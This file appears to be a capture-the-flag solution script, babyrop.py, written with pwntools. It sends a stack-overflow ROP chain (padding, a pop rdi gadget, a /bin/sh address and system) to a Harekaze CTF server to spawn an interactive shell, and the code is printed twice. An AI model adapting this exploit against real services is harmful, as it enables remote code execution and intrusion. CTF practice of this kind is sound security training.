ywkw1717/babyrop.py

## babyrop.py
#!/usr/bin/env python
from pwn import *


def main():
    # conn = process("./babyrop")
    conn = remote("problem.harekaze.com", 20001)

    pop_rdi_ret = 0x400683  #: pop rdi ; ret
    system = 0x400490
    bin_sh = 0x601048

    payload = "A" * 16
    payload += p64(0xdeadbeef)  # rbp
    payload += p64(pop_rdi_ret)
    payload += p64(bin_sh)
    payload += p64(system)
    payload += p64(0xdeadbeef)

    conn.sendline(payload)
    conn.interactive()


if __name__ == "__main__":
    main()
	#!/usr/bin/env python
	from pwn import *


	def main():
	# conn = process("./babyrop")
	conn = remote("problem.harekaze.com", 20001)

	pop_rdi_ret = 0x400683 #: pop rdi ; ret
	system = 0x400490
	bin_sh = 0x601048

	payload = "A" * 16
	payload += p64(0xdeadbeef) # rbp
	payload += p64(pop_rdi_ret)
	payload += p64(bin_sh)
	payload += p64(system)
	payload += p64(0xdeadbeef)

	conn.sendline(payload)
	conn.interactive()


	if __name__ == "__main__":
	main()